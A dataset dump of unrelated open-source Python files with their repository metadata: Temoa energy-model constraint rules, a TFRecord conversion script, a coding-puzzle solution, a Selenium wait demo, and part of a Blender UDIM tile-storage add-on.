parameter}}\n\"\"\"\n collected = sum(\n M.V_FlowOut[p, S_s, S_d, S_i, S_t, S_v, r]\n\n for S_t, S_v in M.ProcessesByPeriodAndOutput(p, r)\n if S_t in M.tech_resource\n for S_i in M.ProcessInputsByOutput(p, S_t, S_v, r)\n for S_s in M.time_season\n for S_d in M.time_of_day\n )\n\n expr = (collected <= M.ResourceBound[p, r])\n return expr\n\n\ndef CommodityBalance_Constraint(M, p, s, d, c):\n r\"\"\"\n\nWhere the Demand constraint :eq:`Demand` ensures that end-use demands are met,\nthe CommodityBalance constraint ensures that the internal system demands are\nmet. That is, this is the constraint that ties the output of one process to the\ninput of another. At the same time, this constraint also conserves energy\nbetween process. (But it does not account for transmission loss.) In this\nmanner, it is a corollary to both the ProcessBalance :eq:`ProcessBalance` and\nDemand :eq:`Demand` constraints.\n\n.. math::\n :label: CommodityBalance\n\n \\sum_{I, T, V} \\textbf{FO}_{p, s, d, i, t, v, c}\n =\n \\sum_{T, V, O} \\textbf{FI}_{p, s, d, c, t, v, o}\n\n \\\\\n \\forall \\{p, s, d, c\\} \\in \\Theta_{\\text{commodity balance}}\n\"\"\"\n if c in M.commodity_demand:\n return Constraint.Skip\n\n vflow_in = sum(\n M.V_FlowIn[p, s, d, c, S_t, S_v, S_o]\n\n for S_t, S_v in M.helper_commodityDStreamProcess[p, c]\n for S_o in M.helper_ProcessOutputsByInput[p, S_t, S_v, c]\n )\n\n vflow_out = sum(\n M.V_FlowOut[p, s, d, S_i, S_t, S_v, c]\n\n for S_t, S_v in M.helper_commodityUStreamProcess[p, c]\n for S_i in M.helper_ProcessInputsByOutput[(p, S_t, S_v, c)]\n )\n\n CommodityBalanceConstraintErrorCheck(vflow_out, vflow_in, p, s, d, c)\n\n expr = (vflow_out == vflow_in)\n return expr\n\n\ndef ProcessBalance_Constraint(M, p, s, d, i, t, v, o):\n r\"\"\"\n\nThe ProcessBalance constraint is one of the most fundamental constraints in the\nTemoa model. It defines the basic relationship between the energy entering a\nprocess (:math:`\\textbf{FI}`) and the energy leaving a processing\n(:math:`\\textbf{FO}`). This constraint sets the :code:`FlowOut` variable, upon\nwhich all other constraints rely.\n\nConceptually, this constraint treats every process as a \"black box,\" caring only\nabout the process efficiency. In other words, the amount of energy leaving a\nprocess cannot exceed the amount coming in.\n\nNote that this constraint is an inequality -- not a strict equality. In most\nsane cases, the optimal solution should make this constraint and supply should\nexactly meet demand. If this constraint is not binding, it is likely a clue\nthat the model under inspection could be more tightly specified and has at least\none input data anomaly.\n\n.. math::\n :label: ProcessBalance\n\n \\textbf{FO}_{p, s, d, i, t, v, o}\n \\le\n EFF_{i, t, v, o}\n \\cdot \\textbf{FI}_{p, s, d, i, t, v, o}\n\n \\\\\n \\forall \\{p, s, d, i, t, v, o\\} \\in \\Theta_{\\text{valid process flows}}\n\"\"\"\n expr = (\n M.V_FlowOut[p, s, d, i, t, v, o]\n ==\n M.V_FlowIn[p, s, d, i, t, v, o]\n * value(M.Efficiency[i, t, v, o])\n )\n\n return expr\n\n\ndef DemandActivity_Constraint(M, p, s, d, t, v, dem, s_0, d_0):\n r\"\"\"\n\nFor end-use demands, it is unreasonable to let the optimizer only allow use in a\nsingle time slice. For instance, if household A buys a natural gas furnace\nwhile household B buys an electric furnace, then both units should be used\nthroughout the year. Without this constraint, the model might choose to only\nuse the electric furnace during the day, and the natural gas furnace during the\nnight.\n\nThis constraint ensures that the ratio of a process activity to demand is\nconstant for all time slices. Note that if a demand is not specified in a given\ntime slice, or is zero, then this constraint will not be considered for that\nslice and demand. This is transparently handled by the :math:`\\Theta` superset.\n\n.. math::\n :label: DemandActivity\n\n DEM_{p, s, d, dem} \\cdot \\sum_{I} \\textbf{FO}_{p, s_0, d_0, i, t, v, dem}\n =\n DEM_{p, s_0, d_0, dem} \\cdot \\sum_{I} \\textbf{FO}_{p, s, d, i, t, v, dem}\n\n \\\\\n \\forall \\{p, s, d, t, v, dem, s_0, d_0\\} \\in \\Theta_{\\text{demand activity}}\n\"\"\"\n\n DSD = M.DemandSpecificDistribution # lazy programmer\n act_a = sum(\n M.V_FlowOut[p, s_0, d_0, S_i, t, v, dem]\n\n for S_i in M.ProcessInputsByOutput(p, t, v, dem)\n )\n act_b = sum(\n M.V_FlowOut[p, s, d, S_i, t, v, dem]\n\n for S_i in M.ProcessInputsByOutput(p, t, v, dem)\n )\n\n expr = (\n act_a * DSD[s, d, dem]\n ==\n act_b * DSD[s_0, d_0, dem]\n )\n return expr\n\n\ndef Demand_Constraint(M, p, s, d, dem):\n r\"\"\"\n\nThe Demand constraint drives the model. This constraint ensures that supply at\nleast meets the demand specified by the Demand parameter in all periods and\nslices, by ensuring that the sum of all the demand output commodity (:math:`c`)\ngenerated by :math:`\\textbf{FO}` must meet the modeler-specified demand, in\neach time slice.\n\n.. math::\n :label: Demand\n\n \\sum_{I, T, V} \\textbf{FO}_{p, s, d, i, t, v, dem}\n \\ge\n {DEM}_{p, dem} \\cdot {DSD}_{s, d, dem}\n\n \\\\\n \\forall \\{p, s, d, dem\\} \\in \\Theta_{\\text{demand}}\n\nNote that the validity of this constraint relies on the fact that the\n:math:`C^d` set is distinct from both :math:`C^e` and :math:`C^p`. In other\nwords, an end-use demand must only be an end-use demand. Note that if an output\ncould satisfy both an end-use and internal system demand, then the output from\n:math:`\\textbf{FO}` would be double counted.\n\nNote also that this constraint is an inequality, not a strict equality. \"Supply\nmust meet or exceed demand.\" Like with the ProcessBalance constraint, if this\nconstraint is not binding, it may be a clue that the model under inspection\ncould be more tightly specified and could have at least one input data anomaly.\n\n\"\"\"\n supply = sum(\n M.V_FlowOut[p, s, d, S_i, S_t, S_v, dem]\n\n for S_t, S_v in M.helper_commodityUStreamProcess[p, dem]\n for S_i in M.helper_ProcessInputsByOutput[p, S_t, S_v, dem]\n )\n\n DemandConstraintErrorCheck(supply, p, s, d, dem)\n\n expr = (supply >= M.Demand[p, dem] * M.DemandSpecificDistribution[s, d, dem])\n\n return expr\n\n\ndef GrowthRateConstraint_rule(M, p, t):\n GRS = value(M.GrowthRateSeed[t])\n GRM = value(M.GrowthRateMax[t])\n CapPT = M.V_CapacityAvailableByPeriodAndTech\n\n periods = sorted(set(p_ for p_, t_ in CapPT if t_ == t))\n\n if p not in periods:\n return Constraint.Skip\n\n if p == periods[0]:\n expr = (CapPT[p, t] <= GRS)\n\n else:\n p_prev = periods.index(p)\n p_prev = periods[p_prev - 1]\n\n expr = (CapPT[p, t] <= GRM * CapPT[p_prev, t] + GRS)\n\n return expr\n\n\n##############################################################################\n# Additional and derived (informational) variable constraints\n\n\ndef ActivityByPeriodAndProcess_Constraint(M, p, t, v):\n if p < v or v not in M.ProcessVintages(p, t):\n return Constraint.Skip\n\n activity = sum(\n M.V_Activity[p, S_s, S_d, t, v]\n\n for S_s in M.time_season\n for S_d in M.time_of_day\n )\n\n if int is type(activity):\n return Constraint.Skip\n\n expr = (M.V_ActivityByPeriodAndProcess[p, t, v] == activity)\n return expr\n\n\n# This is required for MGA objective function\ndef ActivityByTech_Constraint(M, t):\n activity = sum(\n M.V_Activity[S_p, S_s, S_d, t, S_v]\n\n for S_p in M.time_optimize\n for S_s in M.time_season\n for S_d in M.time_of_day\n for S_v in M.ProcessVintages(S_p, t)\n )\n\n if int is type(activity):\n return Constraint.Skip\n\n expr = (M.V_ActivityByTech[t] == activity)\n return expr\n\n\ndef CapacityAvailableByPeriodAndTech_Constraint(M, p, t):\n r\"\"\"\nThe :math:`\\textbf{CAPAVL}` variable is nominally for reporting solution values,\nbut is also used in the Max and Min constraint calculations. For any process\nwith an end-of-life (EOL) on a period boundary, all of its capacity is available\nfor use in all periods in which it is active (the process' TLF is 1). However,\nfor any process with an EOL that falls between periods, Temoa makes the\nsimplifying assumption that the available capacity from the expiring technology\nis available through the whole period, but only as much percentage as its\nlifespan through the period. For example, if a process expires 3 years into an\n8 year period, then only :math:`\\frac{3}{8}` of the installed capacity is\navailable for use throughout the period.\n\n.. math::\n :label: CapacityAvailable\n\n \\textbf{CAPAVL}_{p, t} = \\sum_{V} {TLF}_{p, t, v} \\cdot \\textbf{CAP}\n\n \\\\\n \\forall p \\in \\text{P}^o, t \\in T\n\"\"\"\n cap_avail = sum(\n value(M.ProcessLifeFrac[p, t, S_v])\n * M.V_Capacity[t, S_v]\n\n for S_v in M.ProcessVintages(p, t)\n )\n\n expr = (M.V_CapacityAvailableByPeriodAndTech[p, t] == cap_avail)\n return expr\n\n\ndef EnergyConsumptionByPeriodInputAndTech_Constraint(M, p, i, t):\n energy_used = sum(\n M.V_FlowIn[p, S_s, S_d, i, t, S_v, S_o]\n\n for S_v in M.ProcessVintages(p, t)\n for S_o in M.ProcessOutputsByInput(p, t, S_v, i)\n for S_s in M.time_season\n for S_d in M.time_of_day\n )\n\n expr = (M.V_EnergyConsumptionByPeriodInputAndTech[p, i, t] == energy_used)\n return expr\n\n\ndef ActivityByPeriodTechAndOutput_Constraint(M, p, t, o):\n activity = sum(\n M.V_FlowOut[p, S_s, S_d, S_i, t, S_v, o]\n\n for S_v in M.ProcessVintages(p, t)\n for S_i in M.ProcessInputsByOutput(p, t, S_v, o)\n for S_s in M.time_season\n for S_d in M.time_of_day\n )\n\n if int is type(activity):\n return Constraint.Skip\n\n expr = (M.V_ActivityByPeriodTechAndOutput[p, t, o] == activity)\n return expr\n\n\ndef EmissionActivityByPeriodAndTech_Constraint(M, e, p, t):\n emission_total = sum(\n M.V_FlowOut[p, S_s, S_d, S_i, t, S_v, S_o]\n * M.EmissionActivity[e, S_i, t, S_v, S_o]\n\n for tmp_e, S_i, S_t, S_v, S_o in M.EmissionActivity.sparse_iterkeys()\n if tmp_e == e and S_t == t\n if M.ValidActivity(p, S_t, S_v)\n for S_s in M.time_season\n for S_d in M.time_of_day\n )\n\n if type(emission_total) is int:\n return Constraint.Skip\n\n expr = (M.V_EmissionActivityByPeriodAndTech[e, p, t] == emission_total)\n return expr\n\n\ndef RampUpDay_Constraint(M, p, s, d, t, v):\n # M.time_of_day is a sorted set, and M.time_of_day.first() returns the first\n # element in the set, similarly, M.time_of_day.last() returns the last element.\n # M.time_of_day.prev(d) function will return the previous element before s, and\n # M.time_of_day.next(d) function will return the next element after s.\n\n r\"\"\"\nThe ramp rate constraint is utilized to limit the rate of electricity generation \nincrease and decrease between two adjacent time slices in order to account for \nphysical limits associated with thermal power plants. Note that this constriant \nonly applies to technologies with ramp capability, which is defined in set \n:math:`\\textbf{T}^{ramp}`. We assume for simplicity the rate limits for both \nramp up and down are equal and they do not vary with technology vintage. The \nramp rate limits (:math:`r_t`) for technology :math:`t` should be expressed in \npercentage of its rated capacity.\n\nNote that when :math:`d_{nd}` is the last time-of-day, :math:`d_{nd + 1} \\not \\in \n\\textbf{D}`, i.e., if one time slice is the last time-of-day in a season and the \nother time slice is the first time-of-day in the next season, the ramp rate \nlimits between these two time slices can not be expressed by :eq:`ramp_up_day`. \nTherefore, the ramp rate constraints between two adjacent seasons are \nrepresented in :eq:`ramp_up_season`. \n\nIn Equation :eq:`ramp_up_day` and :eq:`ramp_up_season`, we assume \n:math:`\\textbf{S} = \\{s_i, i = 1, 2, \\cdots, ns\\}` and \n:math:`\\textbf{D} = \\{d_i, i=1, 2, \\cdots, nd\\}`.\n\n.. math::\n \\frac{ \n \\textbf{ACT}_{p, s, d_{i + 1}, t, v} \n }{\n SEG_{s, d_{i + 1}} \\cdot C2A_t \n }\n -\n \\frac{ \n \\textbf{ACT}_{p, s, d_i, t, v} \n }{\n SEG_{s, d_i} \\cdot C2A_t \n }\n \\leq\n r_t \\cdot \\textbf{CAPAVL}_{p,t}\n \\\\\n \\forall \n p \\in \\textbf{P}^o,\n s \\in \\textbf{S},\n d_i, d_{i + 1} \\in \\textbf{D},\n t \\in \\textbf{T}^{ramp},\n v \\in \\textbf{V}\n :label: ramp_up_day\n\"\"\"\n if d != M.time_of_day.first():\n d_prev = M.time_of_day.prev(d)\n expr_left = (\n M.V_Activity[p, s, d, t, v] / value(M.SegFrac[s, d]) -\n M.V_Activity[p, s, d_prev, t, v] / value(M.SegFrac[s, d_prev])\n ) / value(M.CapacityToActivity[t])\n expr_right = M.V_Capacity[t, v] * value(M.RampUp[t])\n expr = (expr_left <= expr_right)\n else:\n return Constraint.Skip\n\n return expr\n\n\ndef RampUpSeason_Constraint(M, p, s, t, v):\n r\"\"\"\nNote that :math:`d_1` and :math:`d_{nd}` represent the first and last time-of-day, \nrespectively.\n\n.. math::\n \\frac{ \n \\textbf{ACT}_{p, s_{i + 1}, d_1, t, v} \n }{\n SEG_{s_{i + 1}, d_1} \\cdot C2A_t \n }\n -\n \\frac{ \n \\textbf{ACT}_{p, s_i, d_{nd}, t, v} \n }{\n SEG_{s_i, d_{nd}} \\cdot C2A_t \n }\n \\leq\n r_t \\cdot \\textbf{CAPAVL}_{p,t}\n \\\\\n \\forall \n p \\in \\textbf{P}^o,\n s_i, s_{i + 1} \\in \\textbf{S},\n d_1, d_{nd} \\in \\textbf{D},\n t \\in \\textbf{T}^{ramp},\n v \\in \\textbf{V}\n :label: ramp_up_season\n\"\"\"\n if s != M.time_season.first():\n s_prev = M.time_season.prev(s)\n d_first = M.time_of_day.first()\n d_last = M.time_of_day.last()\n expr_left = (\n M.V_Activity[p, s, d_first, t, v] / M.SegFrac[s, d_first] -\n M.V_Activity[p, s_prev, d_last, t, v] / M.SegFrac[s_prev, d_last]\n ) / value(M.CapacityToActivity[t])\n expr_right = M.V_Capacity[t, v] * value(M.RampUp[t])\n expr = (expr_left <= expr_right)\n else:\n return Constraint.Skip\n\n return expr\n\n\ndef RampUpPeriod_Constraint(M, p, t, v):\n # if p != M.time_future.first():\n # \tp_prev = M.time_future.prev(p)\n # \ts_first = M.time_season.first()\n # \ts_last = M.time_season.last()\n # \td_first = M.time_of_day.first()\n # \td_last = M.time_of_day.last()\n # \texpr_left = (\n # \t\tM.V_Activity[ p, s_first, d_first, t, v ] -\n # \t\tM.V_Activity[ p_prev, s_last, d_last, t, v ]\n # \t\t)\n # \texpr_right = (\n # \t\tM.V_Capacity[t, v]*\n # \t\tvalue( M.RampUp[t] )*\n # \t\tvalue( M.CapacityToActivity[ t ] )*\n # \t\tvalue( M.SegFrac[s, d])\n # \t\t)\n # \texpr = (expr_left <= expr_right)\n # else:\n # \treturn Constraint.Skip\n\n # return expr\n\n return Constraint.Skip # We don't need inter-period ramp up/down constraint.\n\n\ndef RampDownDay_Constraint(M, p, s, d, t, v):\n r\"\"\"\nSimilar to Equation :eq:`ramp_up_day` and :eq:`ramp_up_season`, we use Equation\n:eq:`ramp_down_day` and :eq:`ramp_down_season` to limit ramp down rates between \nany two adjacent time slices.\n\n.. math::\n \\frac{ \n \\textbf{ACT}_{p, s, d_{i + 1}, t, v} \n }{\n SEG_{s, d_{i + 1}} \\cdot C2A_t \n }\n -\n \\frac{ \n \\textbf{ACT}_{p, s, d_i, t, v} \n }{\n SEG_{s, d_i} \\cdot C2A_t \n }\n \\geq\n -r_t \\cdot \\textbf{CAPAVL}_{p,t}\n \\\\\n \\forall \n p \\in \\textbf{P}^o,\n s \\in \\textbf{S},\n d_i, d_{i + 1} \\in \\textbf{D},\n t \\in \\textbf{T}^{ramp},\n v \\in \\textbf{V}\n :label: ramp_down_day\n\"\"\"\n\n if d != M.time_of_day.first():\n d_prev = M.time_of_day.prev(d)\n expr_left = (\n M.V_Activity[p, s, d, t, v] / value(M.SegFrac[s, d]) -\n M.V_Activity[p, s, d_prev, t, v] / value(M.SegFrac[s, d_prev])\n ) / value(M.CapacityToActivity[t])\n expr_right = -(M.V_Capacity[t, v] * value(M.RampDown[t]))\n expr = (expr_left >= expr_right)\n else:\n return Constraint.Skip\n\n return expr\n\n\ndef RampDownSeason_Constraint(M, p, s, t, v):\n r\"\"\"\n.. math::\n \\frac{ \n \\textbf{ACT}_{p, s_{i + 1}, d_1, t, v} \n }{\n SEG_{s_{i + 1}, d_1} \\cdot C2A_t \n }\n -\n \\frac{ \n \\textbf{ACT}_{p, s_i, d_{nd}, t, v} \n }{\n SEG_{s_i, d_{nd}} \\cdot C2A_t \n }\n \\geq\n -r_t \\cdot \\textbf{CAPAVL}_{p,t}\n \\\\\n \\forall \n p \\in \\textbf{P}^o,\n s_i, s_{i + 1} \\in \\textbf{S},\n d_1, d_{nd} \\in \\textbf{D},\n t \\in \\textbf{T}^{ramp},\n v \\in \\textbf{V}\n :label: ramp_down_season\n\"\"\"\n if s != M.time_season.first():\n s_prev = M.time_season.prev(s)\n d_first = M.time_of_day.first()\n d_last = M.time_of_day.last()\n expr_left = (\n M.V_Activity[p, s, d_first, t, v] /\n value(\n M.SegFrac[s, d_first]\n ) -\n M.V_Activity[p, s_prev, d_last, t, v] /\n value(\n M.SegFrac[s_prev, d_last]\n )\n ) / value(M.CapacityToActivity[t])\n expr_right = -(M.V_Capacity[t, v] * value(M.RampDown[t]))\n expr = (expr_left >= expr_right)\n else:\n return Constraint.Skip\n\n return expr\n\n\ndef RampDownPeriod_Constraint(M, p, t, v):\n # if p != M.time_future.first():\n # \tp_prev = M.time_future.prev(p)\n # \ts_first = M.time_season.first()\n # \ts_last = M.time_season.last()\n # \td_first = M.time_of_day.first()\n # \td_last = M.time_of_day.last()\n # \texpr_left = (\n # \t\tM.V_Activity[ p, s_first, d_first, t, v ] -\n # \t\tM.V_Activity[ p_prev, s_last, d_last, t, v ]\n # \t\t)\n # \texpr_right = (\n # \t\t-1*\n # \t\tM.V_Capacity[t, v]*\n # \t\tvalue( M.RampDown[t] )*\n # \t\tvalue( M.CapacityToActivity[ t ] )*\n # \t\tvalue( M.SegFrac[s, d])\n # \t\t)\n # \texpr = (expr_left >= expr_right)\n # else:\n # \treturn Constraint.Skip\n\n # return expr\n\n return Constraint.Skip # We don't need inter-period ramp up/down constraint.\n\n\ndef ReserveMargin_Constraint(M, p, g, s, d):\n r\"\"\"\nTo assure system reliability of power grid, during each period :math:`p`, the\nsum of available capacity of all reserve technologies (defined by set :math:`\\textbf{T}^{res}`)\n:math:`\\sum_{t \\in T^{res}} \\textbf{CAPAVL}_{p,t}`, should not exceed the peak\nload plus a reserve margin :math:`RES_c`. Note reserve margin is typically\nexpressed in the form of percentage. In Equation :eq:`reserve_margin`, we use \n:math:`(s^*,d^*)` to represent the peak-load time slice.\n\n.. math::\n \\sum_{t \\in T^{res}} {\n CC_t \\cdot\n \\textbf{CAPAVL}_{p,t} \\cdot\n SEG_{s^*,d^*} \\cdot C2A_t }\n \\geq\n DEM_{p,c} \\cdot\n DSD_{s^*, d^*, c} \\cdot\n (1 + RES_c)\n \\\\\n \\forall\n p \\in \\textbf{P}^o,\n c \\in \\textbf{C}^{res}\n :label: reserve_margin\n\"\"\"\n # The season and time-of-day of the slice with the maximum average load.\n PowerTechs = set() # all the power generation technologies\n PowerCommodities = set() # it consists of all the commodities coming out of powerplants: ELCP, ELCP_Renewables, ELCP_SOL\n for i in M.ReserveMargin.sparse_keys():\n if i[1] == g:\n PowerCommodities.add(i[0])\n\n if not PowerCommodities:\n return Constraint.Skip\n\n for i, t, v, o in M.Efficiency:\n if o in PowerCommodities:\n PowerTechs.add(t)\n\n expr_left = sum(value(M.CapacityCredit[t]) *\n M.V_CapacityAvailableByPeriodAndTech[p, t] *\n value(M.CapacityToActivity[t]) *\n value(M.SegFrac[s, d])\n for t in PowerTechs if (p,\n t) in M.CapacityAvailableVar_pt) # M.CapacityAvailableVar_pt check if all the possible consistent combinations of t and p\n\n total_generation = sum(M.V_Activity[p, s, d, t, S_v]\n for t in PowerTechs\n for S_v in M.ProcessVintages(p, t))\n\n expr_right = total_generation * (1 + M.ReserveMargin[PowerCommodities.pop()])\n\n return (expr_left >= expr_right)\n\n# End additional and derived (informational) variable constraints\n##############################################################################\n\n# End *_rule definitions\n##############################################################################\n\n","repo_name":"EnergyModels/temoatools","sub_path":"temoa_stochastic/temoa_model/temoa_rules.py","file_name":"temoa_rules.py","file_ext":"py","file_size_in_byte":58109,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"94"} +{"seq_id":"30800284557","text":"# https://github.com/tensorflow/tensorflow/issues/9675\n# https://github.com/Hvass-Labs/TensorFlow-Tutorials/blob/master/18_TFRecords_Dataset_API.ipynb\n\nimport argparse\nimport sys\n\nimport pandas as pd\nimport tensorflow as tf\n\n\ndef wrap_int64(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\n\ndef wrap_float(value):\n return tf.train.Feature(float_list=tf.train.FloatList(value=[value]))\n\n\ndef wrap_bytes(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\ndef print_progress(count, total):\n # Percentage completion.\n pct_complete = float(count) / total\n\n # Status-message.\n # Note the \\r which means the line should overwrite itself.\n msg = \"\\r- Progress: {0:.1%}\".format(pct_complete)\n\n # Print it.\n sys.stdout.write(msg)\n sys.stdout.flush()\n\n\ndef convert_to_tfrecord(prev_img_paths, curr_img_paths, out_path, categories, speeds):\n # Args:\n # image_paths List of file-paths for the train_images.\n # labels Class-labels for the train_images.\n # out_path File-path for the TFRecords output file.\n\n print(\"\\nCreating: \" + out_path)\n\n # Number of train_images. Used when printing the progress.\n num_images = len(prev_img_paths)\n\n # Open a TFRecordWriter for the output-file.\n with tf.python_io.TFRecordWriter(out_path) as writer:\n # Iterate over all the image-paths and class-labels.\n for i, (prev_img_path, curr_img_path, category, speed) in enumerate(zip(prev_img_paths,\n curr_img_paths,\n categories,\n speeds)):\n # Print the percentage-progress.\n print_progress(count=i, total=num_images - 1)\n\n prev_img_bytes = open(prev_img_path, 'rb').read()\n curr_img_bytes = open(curr_img_path, 'rb').read()\n # Create a dict with the data we want to save in the\n # TFRecords file. You can add more relevant data here.\n data = \\\n {\n 'prev_img': wrap_bytes(prev_img_bytes),\n 'curr_img': wrap_bytes(curr_img_bytes),\n }\n\n if category is not None:\n data['category'] = wrap_int64(int(category))\n data['speed'] = wrap_float(float(speed))\n\n # Wrap the data as TensorFlow Features.\n feature = tf.train.Features(feature=data)\n\n # Wrap again as a TensorFlow Example.\n example = tf.train.Example(features=feature)\n\n # Serialize the data.\n serialized = example.SerializeToString()\n\n # Write the serialized data to the TFRecords file.\n writer.write(serialized)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Convert csv training file into tfrecord files.')\n parser.add_argument('--input_filename', type=str, default='data/labeled_csv/train/train_shard_0.csv',\n help='file to be converted into a tfrecord')\n parser.add_argument('--output_filename', type=str, default='data/tfrecords/train/shard_0.tfrecord',\n help='file location for tfrecord')\n args = parser.parse_args()\n\n file, out = args.input_filename, args.output_filename\n data = pd.read_csv(file)\n length = data.shape[0]\n width = data.shape[-1]\n\n convert_to_tfrecord(prev_img_paths=data.prev_img,\n curr_img_paths=data.curr_img,\n out_path=out,\n speeds=data.speed if width > 2 else [None] * length,\n categories=data.category if width > 2 else [None] * length)\n","repo_name":"nunezpaul/speedchallenge","sub_path":"convert_images_to_tfrecord.py","file_name":"convert_images_to_tfrecord.py","file_ext":"py","file_size_in_byte":3838,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"12069749995","text":"#ABCDEFGHIJKLMNOPQRXTUVWXYZ\ndef solution(name):\n answer = 0\n \n check = len(name) - 1\n \n \n for i,a in enumerate(name):\n answer += min(ord(a) - ord('A') , ord('Z') - ord(a) + 1)\n \n next = i + 1\n while next < len(name) and name[next] == 'A':\n next += 1\n \n check = min([check, 2 *i + len(name) - next, i + 2 * (len(name) -next)])\n \n answer += check\n return answer","repo_name":"KimSeungHyun1217/Algorithm","sub_path":"programmers/조이스틱#42860.py","file_name":"조이스틱#42860.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"31952312162","text":"'''\r\n 等待的示例\r\n'''\r\nimport time\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\n\r\noptions = webdriver.ChromeOptions()\r\n# 设置页面加载策略\r\noptions.page_load_strategy = 'eager'\r\n# options.add_argument('start-maximized')\r\noptions.add_experimental_option('useAutomationExtension', False)\r\noptions.add_experimental_option('excludeSwitches', ['enable-automation', 'enable-logging'])\r\n# 去掉账号密码弹窗\r\nprefs = dict()\r\nprefs[\"credentials_enable_service\"] = False\r\nprefs['profile.password_manager_enable'] = False\r\noptions.add_experimental_option(\"prefs\", prefs)\r\ndriver = webdriver.Chrome(options=options)\r\n\r\ndriver.execute_cdp_cmd(\"Page.addScriptToEvaluateOnNewDocument\", {\r\n \"source\": \"\"\"\r\n Object.defineProperty(navigator, 'webdriver', {\r\n get: () => false\r\n })\r\n \"\"\"\r\n})\r\n# driver = webdriver.Chrome()\r\n# 隐式等待:最大等待5秒的时间。\r\ndriver.implicitly_wait(5)\r\ntime.sleep(5)\r\ndriver.get('http://39.98.138.157/shopxo/index.php')\r\n\r\ndriver.find_element('name', 'wd').send_keys('手机')\r\n# driver.get('http://www.baidu.com')\r\n# 显式等待,等待到kw的元素显示出来,再继续进行后续的操作。\r\n# driver.find_element('id', 'kw').send_keys('虚竹')\r\n# driver.find_element('id', 'su').click()\r\n# 忽略所有的逻辑,运行到这一步就会强制等待5秒钟的时间。\r\n# time.sleep(0.2)\r\n# 显式等待指定元素,最大等待时间是10秒,每0.5秒执行一次,一直到元素被查找到为止,如果没找到,则显示Message的内容,抛出异常TimeoutException\r\nel = WebDriverWait(driver, 2, 0.5).until(lambda el1: driver.find_element('xpath', '//*[@id=\"1\"]/div/div/h3/asda'),\r\n message='显式等待失败')\r\ntemp = WebDriverWait(driver, 10, 0.5).until_not(lambda el: driver.find_element('xpath', '//*[@id=\"1\"]/div/div/h3/a'),\r\n message='显式等待失败')\r\n\r\n# el.click()\r\n\r\n# print(temp)\r\n# driver.quit()\r\n","repo_name":"hoodligan/python","sub_path":"Python_Selenium/class04_wait/wait.py","file_name":"wait.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"70798020150","text":"# SPDX-License-Identifier: GPL-2.0-or-later\n\nimport os\nimport warnings\n\nfrom typing import Collection, Set\n\nimport bpy\n\nfrom bpy.props import PointerProperty\nfrom bpy.types import Image\n\nfrom . import utils\nfrom .utils.image import save_image_copy\nfrom .utils.layer_stack_utils import get_layer_stack_from_prop\n\n\nclass TiledStorage(bpy.types.PropertyGroup):\n \"\"\"Store copies of images as the tiles of a UDIM image. Can be used\n if the fragment shader's texture limit is reached since the tiles\n of a UDIM use the same sampler.\n The image copies are stored on disk in Blender's temporary folder\n and are not saved with the .blend file.\n An instance's initialize method must be called before use.\n \"\"\"\n udim_image: PointerProperty(\n type=bpy.types.Image,\n name=\"Tiled Image\"\n )\n\n def __bool__(self):\n return self.is_initialized\n\n def __contains__(self, image: Image):\n if not self.is_initialized:\n return False\n return next((True for x in self.tiles.values() if x is image), False)\n\n def initialize(self, is_data) -> None:\n \"\"\"Initialize this instance and set whether it is for sRGB or\n non-color images.\n \"\"\"\n self[\"is_data\"] = bool(is_data)\n\n layer_stack = self.layer_stack\n if layer_stack is None:\n raise RuntimeError(\"Cannot find layer stack.\")\n\n self.udim_image = self._init_image()\n\n self[\"tiles\"] = {}\n\n def _init_image(self) -> bpy.types.Image:\n layer_stack = self.layer_stack\n\n name_suffix = 'data' if self.is_data else 'srgb'\n name = f\".pml_{layer_stack.identifier}_tiled_storage_{name_suffix}\"\n\n image = bpy.data.images.new(name, 32, 32, alpha=False,\n float_buffer=self.is_data,\n is_data=self.is_data,\n tiled=True)\n filename = f\"{name}..exr\"\n image.file_format = 'OPEN_EXR'\n image.filepath_raw = os.path.join(bpy.app.tempdir, filename)\n image.use_half_precision = True\n return image\n\n def delete(self) -> None:\n \"\"\"Removes all tiles. Deleting all image copies.\n Does nothing if the instance has not been initialized.\n \"\"\"\n if not self.is_initialized:\n return\n\n numbers = [int(x) for x in self.tiles.keys()]\n for num in numbers:\n # This deletes the file on disk as well\n self.remove_image_by_number(num)\n\n bpy.data.images.remove(self.udim_image)\n\n def add_image(self, image: Image) -> int:\n \"\"\"Stores a copy of image as a UDIM tile. The image source must\n be 'GENERATED' or 'FILE'. Returns the tile number the image was\n added as.\n \"\"\"\n if image.source not in ('GENERATED', 'FILE'):\n raise ValueError(\"image source must be in {'GENERATED', 'FILE'}\")\n\n number: int = self._next_free_number\n\n self.tiles[str(number)] = image\n\n self._save_image_as_tile(image, number)\n\n return number\n\n def get_image_tile_num(self, image: Image) -> int:\n \"\"\"Returns the tile number that image is saved as. Raises a\n ValueError if the image cannot be found.\n \"\"\"\n for num_str, tile_image in self.tiles.items():\n if tile_image is image:\n return int(num_str)\n raise ValueError(\"image not found in tiles\")\n\n def remove_image(self, image: Image) -> None:\n \"\"\"Removes the tile containing a copy of image. Raises a\n ValueError if the image cannot be found.\"\"\"\n number = self.get_image_tile_num(image)\n\n self.remove_image_by_number(number)\n\n def remove_image_by_number(self, number: int) -> None:\n \"\"\"Deletes the UDIM tile given by number.\"\"\"\n del self.tiles[str(number)]\n self._delete_tile_file(number)\n\n if number == 1001:\n # Keep a generated (float) image for the first tile\n # (prevents reloading images as 8-bit)\n self._gen_default_first_tile()\n else:\n # Remove the tile from the UDIM image\n tile = self.udim_image.tiles.get(number)\n if tile is not None:\n self.udim_image.tiles.remove(tile)\n\n def rewrite_image(self, image: Image) -> None:\n \"\"\"Writes image to disk as a UDIM tile.\"\"\"\n number = self.get_image_tile_num(image)\n\n self._save_image_as_tile(image, number)\n\n def update_from(self, images: Collection[Image]) -> None:\n \"\"\"Adds copies of all images in images as 